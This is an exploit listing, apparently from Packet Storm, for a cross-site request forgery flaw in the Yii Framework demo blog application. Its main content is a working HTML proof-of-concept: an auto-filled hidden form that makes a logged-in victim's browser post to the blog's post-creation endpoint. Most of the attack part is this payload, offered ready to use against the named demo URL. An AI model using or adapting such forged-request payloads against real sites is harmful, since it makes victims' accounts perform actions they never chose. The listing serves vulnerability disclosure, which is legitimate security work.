Yii Framework Blog suffers from a cross site request forgery vulnerability.
7bc3cea8501a2ffbbeb09577198793356a4c517a8dd44f39677b563a17afcf94# Exploit Title: Yii Framework Blog Application CSRF Vulnerability
# Date: 3 Mar 2014
# Author: Christy Philip Mathew
# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/
# Category:: web
# Tested on: Windows 8
Attacker will be able to create a post.
<html>
<body>
<form action="
http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">
<input type="hidden" name="Post[title]" value="test" />
<input type="hidden" name="Post[content]" value="test" />
<input type="hidden" name="Post[tags]" value="test" />
<input type="hidden" name="Post[status]" value="2" />
<input type="hidden" name="yt0" value="Create" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed